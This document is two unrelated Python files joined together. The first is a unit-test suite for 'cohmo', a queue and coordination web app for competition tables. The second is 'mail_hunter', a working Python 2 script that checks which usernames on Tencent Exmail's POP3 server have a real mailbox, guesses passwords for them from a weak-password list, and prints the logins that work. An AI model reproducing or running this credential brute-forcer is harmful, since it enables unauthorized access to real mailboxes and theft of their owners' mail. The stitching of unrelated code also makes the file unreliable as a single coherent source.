self.assertEqual(len(history.get_corrections({'table':'T5'})), 3)
self.assertEqual(history.get_corrections({'identifier':'ID2'}), [])
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
self.assertEqual(len(history.get_corrections({'table':'T3'})), 1)
self.assertEqual(len(history.get_corrections({'table':'T8'})), 1)
self.assertEqual(len(history.get_corrections({'table':'T5', 'team':'KOR'})), 1)
self.assertEqual(history.get_corrections({'table':'T5', 'team':'ROK'}), [])
self.assertEqual(len(history.get_corrections({'start_time':(-100,100)})), 7)
self.assertEqual(len(history.get_corrections({'end_time':(15,25)})), 2)
def test_table(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
self.assertEqual(table.queue, ['ITA', 'ENG', 'IND'])
self.assertEqual(table.status, TableStatus.BUSY)
self.assertTrue(table.switch_to_calling())
self.assertEqual(table.status, TableStatus.CALLING)
self.assertTrue(table.switch_to_vacant())
self.assertFalse(table.switch_to_vacant())
self.assertEqual(table.status, TableStatus.VACANT)
self.assertTrue(table.switch_to_busy())
self.assertFalse(table.switch_to_busy())
self.assertEqual(table.status, TableStatus.BUSY)
self.assertTrue(table.start_coordination('IND'))
self.assertEqual(table.status, TableStatus.CORRECTING)
self.assertEqual(table.current_coordination_team, 'IND')
self.assertGreater(table.current_coordination_start_time, 100)
self.assertTrue(table.remove_from_queue('ENG'))
self.assertFalse(table.remove_from_queue('KOR'))
self.assertEqual(table.queue, ['ITA', 'IND'])
# Constructing Table from the file written by dump_to_file.
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
self.assertEqual(table.queue, ['ITA', 'IND'])
self.assertEqual(table.status, TableStatus.CORRECTING)
self.assertEqual(table.current_coordination_team, 'IND')
self.assertFalse(table.switch_to_calling())
self.assertFalse(table.switch_to_busy())
self.assertFalse(table.switch_to_vacant())
self.assertFalse(table.start_coordination('ITA'))
self.assertEqual(len(history.get_corrections({'table':'T2', 'team':'IND'})), 0)
self.assertTrue(table.finish_coordination())
self.assertEqual(table.status, TableStatus.VACANT)
self.assertEqual(len(history.get_corrections({'table':'T2', 'team':'IND'})), 1)
# Testing the queue modifying APIs.
self.assertTrue(table.add_to_queue('ENG'))
self.assertFalse(table.add_to_queue('ITA'))
self.assertTrue(table.add_to_queue('KOR', 0))
self.assertTrue(table.add_to_queue('CHN', 2))
self.assertEqual(table.queue, ['KOR', 'ITA', 'CHN', 'IND', 'ENG'])
self.assertFalse(table.remove_from_queue('FRA'))
self.assertTrue(table.remove_from_queue('ITA'))
self.assertFalse(table.remove_from_queue('ITA'))
self.assertFalse(table.swap_teams_in_queue('CHN', 'CHN'))
self.assertFalse(table.swap_teams_in_queue('FRA', 'KOR'))
self.assertTrue(table.swap_teams_in_queue('KOR', 'IND'))
self.assertEqual(table.queue, ['IND', 'CHN', 'KOR', 'ENG'])
# Testing operations_num.
def test_operations_num(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
ops = history.operations_num
self.assertTrue(table.start_coordination('ITA'))
self.assertAlmostEqual(history.operations_num, ops+1)
self.assertTrue(table.finish_coordination())
self.assertAlmostEqual(history.operations_num, ops+2)
self.assertTrue(table.add_to_queue('CHN'))
self.assertAlmostEqual(history.operations_num, ops+3)
# Testing get_expected_duration.
mock_time = Mock()
mock_time.side_effect = [10123, 10, 3, 10, 4, 10, 2, 10, 11, 10, 10, 10, 10,
2, 10, 11, 10, 2, 10, 11, 10,
2, 10, 3, 10, 2, 10, 3, 10] # 10123 = history.operations_num
@patch('time.time', mock_time)
def test_get_expected_duration(self):
cohmo.app.config['NUM_SIGN_CORR'] = 2
cohmo.app.config['APRIORI_DURATION'] = 3
cohmo.app.config['MINIMUM_DURATION'] = 2
cohmo.app.config['MAXIMUM_DURATION'] = 8
cohmo.app.config['START_TIME'] = 0
tmp_maximum_time = cohmo.app.config['MAXIMUM_TIME']
cohmo.app.config['MAXIMUM_TIME'] = 25
cohmo.app.config['BREAK_TIMES'] = [[14, 16]]
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
# Testing the basic behaviour.
self.assertEqual(history.corrections[0].duration(), 5)
self.assertEqual(len(history.get_corrections({'table':'T2'})), 1)
self.assertAlmostEqual(table.get_expected_duration(), 4) # 10
self.assertTrue(table.start_coordination('ITA')) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 4)
self.assertTrue(table.finish_coordination()) # 4, 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
# Testing the imposition on the maximum_time.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 13/3)
# Testing the case when the history is empty.
self.assertEqual(len(history.get_corrections({'table':'T2'})), 3)
corrections = history.get_corrections({'table':'T2'})
self.assertTrue(history.delete(corrections[0].id))
self.assertTrue(history.delete(corrections[1].id))
self.assertTrue(history.delete(corrections[2].id))
self.assertEqual(len(history.get_corrections({'table':'T2'})), 0)
# Recomputing the expected_duration and deleting almost all the queue.
table.compute_expected_duration() # 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
self.assertTrue(table.remove_from_queue('ENG')) # 10
self.assertTrue(table.remove_from_queue('IND')) # 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
# Testing the maximum_duration.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 6)
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 8)
# Clearing the history again.
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
corrections = history.get_corrections({'table':'T2'})
self.assertTrue(history.delete(corrections[0].id))
self.assertTrue(history.delete(corrections[1].id))
# Testing the minimum_duration.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 2)
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 2)
cohmo.app.config['MAXIMUM_TIME'] = tmp_maximum_time
def test_authentication_manager(self):
authentication_manager = \
AuthenticationManager(cohmo.app.config['AUTHENTICATION_FILE_PATH'])
self.assertFalse(authentication_manager.verify_password('', ''))
self.assertFalse(authentication_manager.verify_password('x', 'y'))
self.assertFalse(authentication_manager.verify_password('marco', 'x'))
self.assertFalse(authentication_manager.verify_password('marco', 'pass'))
self.assertFalse(authentication_manager.verify_password('admin', 'xxx'))
self.assertTrue(authentication_manager.verify_password('marco', 'xxx'))
self.assertTrue(authentication_manager.verify_password('admin', 'pass'))
self.assertFalse(authentication_manager.is_authorized('T1', 'T2'))
self.assertFalse(authentication_manager.is_authorized('marco', 'T8'))
self.assertFalse(authentication_manager.is_authorized('marco', 'T111'))
self.assertTrue(authentication_manager.is_authorized('marco', 'T5'))
self.assertTrue(authentication_manager.is_authorized('marco', 'T2'))
self.assertTrue(authentication_manager.is_authorized('admin', 'T2'))
self.assertTrue(authentication_manager.is_authorized('admin', 'T5'))
self.assertFalse(authentication_manager.is_admin('XXX'))
self.assertFalse(authentication_manager.is_admin('marco'))
self.assertTrue(authentication_manager.is_admin('admin'))
def test_views_table_queue_modifications(self):
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing add_to_queue.
resp = json.loads(client.post('/table/T1/add_to_queue', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team ENG is already in queue at table T2.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND', 'CHN'])
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'FRA', 'pos': 2})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'FRA', 'IND', 'CHN'])
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND', 'CHN'])
# Testing remove_from_queue.
resp = json.loads(client.post('/table/T1/remove_from_queue', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'KOR'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
# Testing swap_teams_in_queue.
resp = json.loads(client.post('/table/T1/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ITA', 'ENG']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'pippo': ['USA']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify the teams to be swapped.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['VAT']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to give exactly two teams to be swapped.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['VAT', 'ENG']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ITA', 'KOR']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ENG', 'ITA']})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'ITA', 'IND'])
def test_views_table_coordination_management(self):
cohmo.app.config['SKIPPED_POSITIONS'] = 1
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing start_coordination.
resp = json.loads(client.post('/table/T1/start_coordination', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'KOR'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 1)
# Testing finish_coordination.
resp = json.loads(client.post('/table/T1/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.post('/table/T2/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False)
# Testing pause_coordination.
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN'])
resp = json.loads(client.post('/table/T1/pause_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/pause_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing switch_to_calling.
resp = json.loads(client.post('/table/T1/switch_to_calling', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_calling', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
# Testing switch_to_vacant.
resp = json.loads(client.post('/table/T1/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing switch_to_busy.
resp = json.loads(client.post('/table/T1/switch_to_busy', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_busy', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 2)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing call_team
resp = json.loads(client.post('/table/T1/call_team', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['FRA', 'IND', 'CHN', 'ENG'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'IND'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'FRA', 'CHN', 'ENG'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.post('/table/T2/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing skip_to_next.
resp = json.loads(client.post('/table/T1/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You can not skip to call the next team if you are not calling.')
resp = json.loads(client.post('/table/T2/switch_to_calling', headers=headers,).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['CHN', 'IND', 'ENG'])
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'IND'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
resp['message'] == 'There is only a team to correct yet.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/skip_to_next', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
resp['message'] == 'There are no teams to correct.')
def test_views_table_get(self):
cohmo.app.config['START_TIME'] = 0 # past
cohmo.app.config['MAXIMUM_TIME'] = int(time.time()) + 3600*100 #future
cohmo.app.config['BREAK_TIMES'] = []
cohmo.app.config['MINIMUM_DURATION'] = 1
cohmo.app.config['NUM_SIGN_CORR'] = 2
cohmo.app.config['APRIORI_DURATION'] = 3
cohmo.views.init_chief()
client = cohmo.app.test_client()
# Testing get_queue.
resp = json.loads(client.get('/table/T1/get_queue').data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
# Testing get_all.
resp = json.loads(client.get('/table/T1/get_all').data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data, {'name': 'T2', 'problem': '3',
'coordinators': ['Franco Anselmi', 'Antonio Cannavaro'],
'queue': ['ITA', 'ENG', 'IND'],
'status': 2,
'current_coordination_start_time': None,
'current_coordination_team': None,
'expected_duration': 4.0})
# Testing tables get_all.
resp = json.loads(client.get('/tables/get_all',
data=json.dumps({})).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertEqual(len(json.loads(resp['tables'])), 4)
self.assertEqual(resp['changed'], True)
last_update = resp['last_update']
resp = json.loads(client.get('/tables/get_all',
query_string = {'last_update': last_update}).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertFalse(resp['changed'])
resp = json.loads(client.get('/tables/get_all',
query_string = {'last_update': last_update-1}).data)
self.assertTrue('ok' in resp and resp['ok'])
self.assertEqual(len(json.loads(resp['tables'])), 4)
self.assertEqual(resp['changed'], True)
def test_views_history(self):
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing history_add.
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'pippo': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a table.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a start time.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8',
'start_time': 10})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify an end time.')
resp = json.loads(client.post('/history/add', headers=headers,
data=json.dumps({'team': 'ITA',
'table': 'T8',
'start_time': 10,
'end_time': 25})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
# Testing history_delete.
resp = json.loads(client.post('/history/delete', headers=headers,
data=json.dumps({'pippo': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a correction id.')
resp = json.loads(client.post('/history/delete', headers=headers,
data=json.dumps({'correction_id': 'ID2'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
# Testing history_get_corrections.
resp = json.loads(client.get('/history/get_corrections',
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify filters.')
resp = json.loads(client.get('/history/get_corrections',
data=json.dumps({'filters': {'team':'USA'}})).data)
self.assertTrue('ok' in resp and resp['ok'] == True and
'corrections' in resp and len(resp['corrections']) == 1)
correction = resp['corrections'][0]
self.assertEqual(correction, {'team': 'USA', 'table': 'T2',
'start_time': 5, 'end_time': 10,
'id': 'ID1'})
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/python
#coding:utf-8
'''
mail_hunter: brute-forces weak passwords on Tencent Exmail (pop.exmail.qq.com) POP3 accounts. Python 2 only.
'''
import poplib
import argparse
import time
import os
def tencent(usernames,suffix):
server="pop.exmail.qq.com"
try:
pop = poplib.POP3_SSL(server,995)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
print "No Response"
users=[]
with open(usernames,'rb') as userFile:
while True:
user=userFile.readline().strip()
if user=='':
break
# users.append(user+'@'+suffix)
users.append(user)
for i in range(0,len(users)):
name=users[i].split('@')[0]
temp=users[i].split('@')[1]
try:
pop=poplib.POP3_SSL(server,995)
pop.user(users[i])
auth=pop.pass_(name)
if auth=="+OK":
pop.quit()
print "\n"+"[SUCCESS]:"+users[i]+'-----'+name+'\n'
else:
pop.quit()
sleepsometime()
except Exception,e:
e=str(e).decode('gbk')
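            # u'密码错误或者...' ("wrong password or ...") in the server reply means the mailbox exists, so it is worth brute-forcing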
if e.count(u'密码错误或者')>0:
print users[i]+"---"+"exists brute for passwd"
domain_local=temp.split('.')[0]
passwds=[]
passwds.append(domain_local+'@123')
weak_value=['Asdf1234','Qwer1234','Abcd1234','a123456',name[0].upper()+name[1:]+'123',name+'123',name+'1234']
passwds.extend(weak_value)
if len(domain_local)<4:
passwds.append(domain_local+'1234')
                    passwds.append(domain_local[0].upper()+domain_local[1:]+'1234')
else:
passwds.append(domain_local+'123')
passwds.append(domain_local[0].upper()+domain_local[1:]+'123')
for passwd in passwds:
try:
pop=poplib.POP3_SSL(server,995)
print "[try]"+users[i]+'----'+passwd
pop.user(users[i])
auth=pop.pass_(passwd)
#mm=str(auth).decode('gbk')
#print "this is auth:"+mm
if auth=="+OK":
pop.quit()
print "\n"+"[SUCCESS]:"+users[i]+'-----'+passwd+'\n'
break
else:
pop.quit()
sleepsometime()
except Exception,e:
sleepsometime()
pass
else:
print users[i]+'---',
print e
def sleepsometime():
time.sleep(5)
if __name__=="__main__":
parser=argparse.ArgumentParser()
parser.add_argument('-u','--username',dest='username',help='wordlist of username',required=True)
# parser.add_argument('-s','--suffix',dest='suffix',help='suffix of mail',required=True)
arg=parser.parse_args()
usernames=arg.username
# suffix=arg.suffix
tencent(usernames,'suffix')
|